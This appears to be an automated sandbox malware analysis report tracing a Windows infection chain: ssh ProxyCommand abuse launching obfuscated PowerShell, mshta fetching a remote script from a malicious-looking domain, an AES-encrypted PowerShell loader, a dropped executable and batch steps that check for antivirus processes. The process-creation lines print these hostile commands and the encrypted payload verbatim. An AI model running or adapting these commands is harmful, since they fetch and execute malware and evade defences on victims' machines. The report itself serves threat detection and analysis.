Source: mshta.exe, 00000005.00000003.2238526594.000001FCD854E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2239040824.000001FCD855F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250909549.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4l
Source: mshta.exe, 00000005.00000002.2251189678.000001FCDC45F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240187331.000001FCDC45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4mLMEM
Source: powershell.exe, 00000004.00000002.2079166575.0000017180001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4p
Source: powershell.exe, 00000004.00000002.2082048730.00000171ED5AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4unh
Source: mshta.exe, 00000005.00000002.2248744845.000001F4D57E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4w
Source: powershell.exe, 00000004.00000002.2082612809.00000171EEF50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-vipticket.com/k.mp4~
Source: powershell.exe, 00000007.00000002.2175697500.00000198343E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wserdtfyguhij.2024-viptickp
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Concerts.com.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Sophisticated.9.dr, Concerts.com.10.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443

Source: unknown	HTTPS traffic detected: 172.67.219.101:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.101:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.2:443 -> 192.168.2.5:49948 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

9_2_004050F9

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_004044D1

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

9_2_004038AF

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\AcademicEpisodes	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\DelawareParticipation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\ConnectivityWhole	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\ShapesAnal	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\BreakingAcknowledged	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\CupRemainder	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\GraveFunction	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\CandidatesUtilize	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\SexualityDiffs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	File created: C:\Windows\NetworksModerators	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF847620E45	7_2_00007FF847620E45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8476F0FB6	7_2_00007FF8476F0FB6
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_0040737E	9_2_0040737E
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_00406EFE	9_2_00406EFE
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_004079A2	9_2_004079A2
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_004049A8	9_2_004049A8

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\136140\Concerts.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: String function: 004062CF appears 58 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@35/34@3/3

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

9_2_004044D1

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_004024FB CoCreateInstance,

9_2_004024FB

Source: C:\Windows\System32\OpenSSH\ssh.exe

File created: C:\Users\user\.ssh

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkwjqpqb.1mx.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://wserdtfyguhij.2024-vipticket.com/k.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe "C:\Users\user\AppData\Roaming\IntroductoryTunes.exe"
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 136140
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DEALERPICRESPONDEDCOURAGEPREREQUISITEOLYMPUSDIAGRAMENGAGED" Sunny
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Steady + ..\Ts + ..\Unnecessary + ..\Minutes + ..\Silk + ..\Contents + ..\Global d
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\136140\Concerts.com Concerts.com d
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://wserdtfyguhij.2024-vipticket.com/k.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe "C:\Users\user\AppData\Roaming\IntroductoryTunes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 136140	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DEALERPICRESPONDEDCOURAGEPREREQUISITEOLYMPUSDIAGRAMENGAGED" Sunny	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Steady + ..\Ts + ..\Unnecessary + ..\Minutes + ..\Silk + ..\Contents + ..\Global d	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\136140\Concerts.com Concerts.com d	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: libcrypto.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
